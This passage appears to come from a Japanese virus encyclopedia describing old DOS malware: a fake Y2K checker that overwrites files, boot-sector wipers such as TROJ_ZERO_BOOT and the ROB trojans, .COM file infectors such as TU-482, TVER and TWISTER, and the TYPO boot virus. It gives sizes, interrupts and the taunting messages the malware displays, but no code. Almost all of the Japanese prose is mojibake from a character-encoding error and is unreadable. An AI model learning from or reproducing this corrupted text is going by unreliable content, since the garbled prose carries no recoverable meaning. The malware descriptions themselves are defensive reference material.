Áõ¤¤¡¢¥Õ¥¡¥¤¥ë̾¤â"Y2K.EXE"¤È¤¤¤¦Ì¾Á°¤ò»ÈÍѤ·¤Æ¤¤¤Þ ¤¹¡£¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¡¢°Ê²¼¤Î¥¹¥Æ¡¼¥¿¥¹¤òɽ¼¨¤·¤Þ¤¹¡£ Timer Device Drivers File System BIOS ¤Þ¤¿¡¢²èÌ̤β¼Êý¤Ë°Ê²¼¤Î¥Æ¥­¥¹¥È¤¬É½¼¨¤µ¤ì¤Þ¤¹¡£ Y2K Copyright (C) 1999 - 2002 ChipTec All Rights Reserved ¥¹¥Æ¡¼¥¿¥¹¤¬°Üư¤·¡¢¤¤¤«¤Ë¤âY2K¤ÎÌäÂê¤ò¥Á¥§¥Ã¥¯¤·¤Æ¤¤ ¤ë¤è¤¦¤Ë¸«¤»¤«¤±¤Þ¤¹¤¬¡¢¼Â¤Ï¤½¤Î´Ö¤ËC¥É¥é¥¤¥Ö¤Î¤¹¤Ù¤Æ ¤Î¥Õ¥¡¥¤¥ë¤ò¾å½ñ¤­¤·¤Æ¡¢Ç˲õ¤·¤Æ¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ ¾å½ñ¤­¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤ÎÃæ¤Ë¤Ï°Ê²¼¤Î¥Æ¥­¥¹¥È¤¬´Þ¤Þ¤ì¤Æ ¤¤¤Þ¤¹¡£ "This file is sick! It was contaminated by the radiation liberated... by the explosion of the atomic bomb..." ¤¿¤À¤·¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤˤÏE-Mail¤ò»ÈÍѤ¹¤ë¤Ê¤É¤Î¼«¸Ê ³È»¶µ¡Ç½¤Ï¤Ê¤¤¤¿¤á¡¢¤½¤ì¤Û¤ÉÂ礭¤ÊÈï³²¤ò¤â¤¿¤é¤¹¤³¤È ¤Ï¤Ê¤¤¤Ç¤·¤ç¤¦¡£

TROJ_ZERO_BOOT


̾¡¡¡¡¾Î:TROJ_ZERO_BOOT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Dos Exec

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1,280 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ñ¡¼¥Æ¥£ ¥·¥ç¥ó¥Ö¡¼¥È¥»¥¯¥¿¤ò¤¹¤Ù¤Æ¡È00 00¡É¤Ç¾å½ñ¤­¤¹¤ë¡£¤³¤Î ¤¿¤á¡¢¥Ö¡¼¥È¥»¥¯¥¿¤¬µ¡Ç½¤·¤Ê¤¯¤Ê¤ê¡¢¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¤ò ºîÀ®¤·Ä¾¤µ¤Ê¤¯¤Æ¤Ï¤Ê¤é¤Ê¤¯¤Ê¤Ã¤Æ¤·¤Þ¤¦¡£

TROJROBA


̾¡¡¡¡¾Î:TROJROBA

ÊÌ¡¡¡¡Ì¾:ROB

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:660 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¡Ý¡¡DOSVer.2°Ê¾å¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿°­
¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡
Ç˲õ³èư:
¡¡¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¡¼¤Ê¤É¤ò¾å½ñ¤­¤·¡¢¥Ï ¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ç¡¼¥¿¤òÇ˲õ¤¹¤ë¡£ ¡Ý¡¡¥Õ¥¡¥¤¥ë¤òµ¯Æ°¤¹¤ë¤È¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿ ¡¼¤Ê¤É¤ò°Ê²¼¤Îʸ»úÎ󤬰Ź沽¤µ¤ì¤Æ´Þ¤Þ¤ì¤Æ¤¤¤ë¥Ç¡¼¥¿
¤Ç¾å½ñ¤­¤¹¤ë:
"lameness such lamenessdblquote""Oh dearޤ it looks like Rob has eaten your hard drive.¡É ¡Ý¡¡¤³¤Î¥×¥í¥°¥é¥à¤Ë¾å½ñ¤­¤µ¤ì¤¿¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤«¤é¥Þ ¥·¥ó¤¬µ¯Æ°¤µ¤ì¤ë¤È°Ê²¼¤Îʸ»úÎó¤ò´Þ¤à¥á¥Ã¥»¡¼¥¸¤¬É½¼¨ ¤µ¤ì¡¢¥­¡¼ÆþÎÏÂÔ¤Á¤Î¾õÂ֤ˤʤ롣 ¡ÈOh dearޤ it looks like Rob has eaten your hard drive.¡É ¡Ý¡¡¥­¡¼ÆþÎϤò¹Ô¤¦¤È¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤¬Ç˲õ¤µ¤ì¥Ï¡¼¥É¥Ç ¥£¥¹¥¯¤Ø¤Î¥¢¥¯¥»¥¹¤¬¤Ç¤­¤Ê¤¯¤Ê¤ë¡£ ¡Ý¡¡DOS¡¡Ver.2°ÊÁ°¤ÎDOS¤Ç¤ÏȯɤǤ­¤Ê¤¤¡£
È÷¡¡¡¡¹Í:

TROJROBB


̾¡¡¡¡¾Î:TROJROBB

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:877¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë
Ž¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¼¡¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡¡¡¡¡¡¡ÈNow... How old was that backup?? Serves you right!¡É ¡¡¡¡¡Ê¤µ¤Æ¡ÄºÇ¸å¤Ë¥Ð¥Ã¥¯¥¢¥Ã¥×¤·¤¿¤Î¤Ï¤¤¤Ä¤«¤Ê¡©¡©¡¡ ¥¶¥Þ¡¼¥ß¥í¡ª¡Ë ¡¡¤Ä¤¤¤Ç¥Ï¡¼¥É¥Ç¥£¥¹¥¯¥É¥é¥¤¥Ö¤òÄ´¤Ù¡¢¥Ö¡¼¥È¥»¥¯¥¿ ¡¼¤ò°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤Ë½ñ¤­´¹¤¨¤ë¡£ ¡¡¡¡¡¡¡È[ROB] The SAVAGE Trojan by TTA¡É ¡¡¡¡¡¡¡ÈAxe your machine - Your hard drive is HISTORY!!HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA !!!!¡É ¡¡¡¡¡Ê¤ª¤Þ¤¨¤Î¥Þ¥·¥ó¤ò¤Ö¤Ã¤¿ÀڤäƤä¤ë¡½¤³¤Î¥Ï¡¼¥É¥Ç ¥£¥¹¥¯¤Ï¤â¤¦²áµî¤Î°äʪ¤À¡ª¡ª¡¡ ¡¡¡¡¡¡¥Ï¥Ï¥Ï¥Ï¥Ï¡ª¡ª¡ª¡ª¡ª¡Ë ¡¡¡¡¡¡¡È(FUCK where¡Çs that last backup? Shit it¡Çs only 5 MONTHS OLD!)¡É ¡¡¡¡¡Ê¤¤¤Á¤Ð¤ó¿·¤·¤¤¥Ð¥Ã¥¯¥¢¥Ã¥×¤Ï¤É¤³¤À¡©¡¡¤Ê¤ó¤À ¤è¡¢¤¿¤Ã¤¿5¥ö·îÁ°¤«¡ª¡Ë ¡¡¤½¤Î¸å¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎËÁƬ0x1F4¥»¥¯¥¿¡¼¤ò¾å½ñ¤­¤¹ ¤ë¡£ºÇ¸å¤Ë¥­¡¼ÆþÎÏÂÔ¤Á¤Î¾õÂ֤ˤʤꡢ¥­¡¼ÆþÎϤ¬¤¢¤ë ¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ï¥¢¥¯¥»¥¹ÉÔǽ¤Ë¤Ê¤ë¡£
»³²:
¡¡¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ë¥¢¥¯¥»¥¹¤Ç¤­¤Ê¤¯¤Ê¤ë¡£
È÷¡¡¡¡¹Í:¡¡ºÇ½é´ü¤ÎDOS¤Ë¤Ï¤Ê¤¤¸Æ¤Ó½Ð¤·¤ò»È¤¦¤¿¤á¡¢¥¦
¥¤¥ë¥¹¤ÏºÇ½é¤ËDOS¤Î¥Ð¡¼¥¸¥ç¥ó¤¬2.0°Ê¾å¤Ç¤¢¤ë¤«¤É¤¦¤« ¤òÄ´¤Ù¤ë¡£¤½¤ì¤è¤ê¤â¸Å¤¤¥Ð¡¼¥¸¥ç¥ó¤Ç¤¢¤ì¤Ð¡¢¾åµ­¤Î³è ư¤Ï¹Ô¤Ê¤ï¤º¡¢¥×¥í¥°¥é¥à¤ò½ªÎ»¤µ¤»¤ëŽ¡

TU-482


̾¡¡¡¡¾Î:TU-482

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:482¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¡¢¾å°Ì¥á¥â¥ê¤Ë¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21H

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤Ï482¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£

È÷¡¡¡¡¹Í:1¡Ë¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß
¶Ø»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ 2¡Ë¥¦¥¤¥ë¥¹¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥×¥í¥°¥é¥à¤ÎºÇ¸å¤Ø°Üư¤¹¤ë¡£ ¤·¤«¤·¡¢¤Þ¤¿¤¹¤°ÀèÆ¬Éô¤Ø¥¸¥ã¥ó¥×¤·¤Æ¤·¤Þ¤¦¤¿¤áȯ¸«¤Ï º¤Æñ¤Ç¤¢¤ëŽ¡

TUM2


̾¡¡¡¡¾Î:TUM2

ÊÌ¡¡¡¡Ì¾:TUMEN.xxxx

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1,255-1,663¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¥á¥â¥ê¤Ë¾ïÃó¤·¡¢
¤½¤Î¸å¥¢¥¯¥»¥¹¤Î¤¢¤Ã¤¿COM¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤·¤Æ¤¤¤¯¡£
¾É¾õ:
DOS¥Æ¥­¥¹¥È¤Î¥Õ¥©¥ó¥È¤Î¿§¤òÊѹ¹¤¹¤ë¡£Ïµ¤Î±óËʤ¨¤Ë»÷¤¿ ¥µ¥¦¥ó¥É¤òÌĤ餹¡£

TVER


̾¡¡¡¡¾Î:TVER

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:308¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¾ïÃó¤·¡¢¤½¤Î¸å¥ª¥ê¥¸¥Ê¥ë¥ë ¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È´¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21h

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:
1¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉդȻþ¹ï¤ÏÊѹ¹¤µ¤ì¤ë¡£ 2¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤Ï308¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£
È÷¡¡¡¡¹Í:¿¤¯¤Î¥Õ¥¡¥¤¥ë¤ÎÀèÆ¬¤Î1¥Ð¥¤¥È¤ÏE9h¥Ð¥¤¥È¤Ç
¤¢¤ë¡£ ¥Õ¥¡¥¤¥ë¤ÎºÇ½é¤¬E9h¥Ð¥¤¥È¤Ç¤Ï¤Ê¤¤¾ì¹ç¡¢¥¦¥¤¥ë¥¹¤ÏÂçÄñ ¤³¤ì¤ò½ñ¤­´¹¤¨¤ë¡£

TWIN-PEAK


̾¡¡¡¡¾Î:TWIN-PEAK

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:ÊѲ½¤Ê¤·

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
1¡Ë¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î.COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 2¡Ë¤¹¤Ç¤Ë TWIN-PEAK¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤Æ¤¤¤ì¤Ð¡¢Â¾¤Î̤´¶ À÷.COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 3¡Ë°ìÅ٤δ¶À÷¤Ç¥Õ¥¡¥¤¥ë1¤Ä¤Ë´¶À÷¤¹¤ë¡£
Ç˲õ:
¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¾å½ñ¤­¤¹¤ë¤Î¤Ç¡¢¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤Ï ÊѤï¤é¤Ê¤¤¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:¤Ê¤·

È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TWST.1015


̾¡¡¡¡¾Î:TWST.1015

ÊÌ¡¡¡¡Ì¾:TWISTER

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1015

ȯ¾ÍÃÏ:byte

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:[
¡Ý¡¡¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¥á¥â¥êÃæ¤Ë¾ïÃó¤·¡¢¥ª¥ê ¥¸¥Ê¥ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¡£ ¡Ý¡¡Ì¤´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ëÅ٤˴¶À÷¤¹¤ë¡£´û¤Ë¼«¤é¤¬ ´¶À÷¤·¤Æ¤¤¤ë¥Õ¥¡¥¤¥ë¤Ë¤â´¶À÷¤ò¹Ô¤¦¡£
¡Ý¡¡¥¦¥¤¥ë¥¹Æâ¤Ë°Ê²¼¤Îʸ»úÎó¤¬´Þ¤Þ¤ì¤Æ¤¤¤ë:
"Twister (c) 1992"
È÷¡¡¡¡¹Í:¡¡¤µ¤Þ¤¶¤Þ¤Ê¥µ¥¤¥º¤Î°¡¼ï¤¬Â¸ºß¤¹¤ë¡£

TYPO


̾¡¡¡¡¾Î:TYPO

ÊÌ¡¡¡¡Ì¾:TYPO BOOTޤ MISTAKE

ʬ¡¡¡¡Îà:¥·¥¹¥Æ¥àÎΰ贶À÷·¿

ÂС¡¡¡¾Ý:FD:¥Ö¡¼¥È¥»¥¯¥¿;HD:¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:޲޽Ž×Ž´ŽÙ

ȯ¸«Æü:1986/06

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥·¥¹¥Æ¥à¥á¥â¥ê¡¼¤ËºÆ¾å°Ì ¤Ë2K¤Î¥µ¥¤¥º¤Ç¾ïÃ󤹤롣 ¡Ý¾ïÃó¸å¤Ë¡¢¥×¥ê¥ó¥È¥¢¥¦¥È¤¹¤ë¤È¤¢¤ëʸ»ú¤¬È¯²»µ­¹æ¤Î ¤è¤¦¤Êʸ»ú¤ËÂå¤ï¤Ã¤Æ½ÐÎÏ ¡¡¤µ¤ì¤ë¡£ ¡Ý¥Ø¥Ö¥é¥¤¸ì¤Îʸ»ú¤ò¾¤Î¥Ø¥Ö¥é¥¤¸ì¤Îʸ»ú¤ËÊѤ¨¤Æ¤·¤Þ ¤¦¤¿¤á¡¢¥¤¥¹¥é¥¨¥ë¿Í¤¬¤³¤Î ¡¡¥¦¥£¥ë¥¹¤òºîÀ®¤·¤¿¤È»×¤ï¤ì¤ë¡£¹¹¤Ë¡¢¥¢¥é¥Ó¥¢¿ô»ú¤ò ¾¤Î¿ô»ú¤ËÊѤ¨¤ë¤Þ¤¿¤ÏÃÖ¤­ ¡¡´¹¤¨¤Æ¤·¤Þ¤¦¡£¥×¥ê¥ó¥È¥¢¥¦¥È¤·¤¿¤È¤­¤Î¤ß¤Ëµ¯¤³¤ê¡¢ ¸µ¤Î¥Ç¡¼¥¿Åù¤ÏÊѤ¨¤é¤ì¤Æ ¡¡¤¤¤Ê¤¤¡£ ¡ÝPing Pong¤Ë¹½Â¤¾åÈó¾ï¤Ë»÷¤Æ¤¤¤ë¤¿¤áPing Pong¤ÎÊÑ¼ï ¤È»×¤ï¤ì¤ë¡£¤½¤Î¤¿¤áFDiskޤ ¡¡CleanUpޤSYS¥³¥Þ¥ó¥É¤Ê¤ÉPing Pong¤ò½üµî¤¹¤ë¤Î¤ÈƱ¤¸ ÊýË¡¤Ç½üµî¤Ç¤­¤ë¡£
È÷¡¡¡¡¹Í: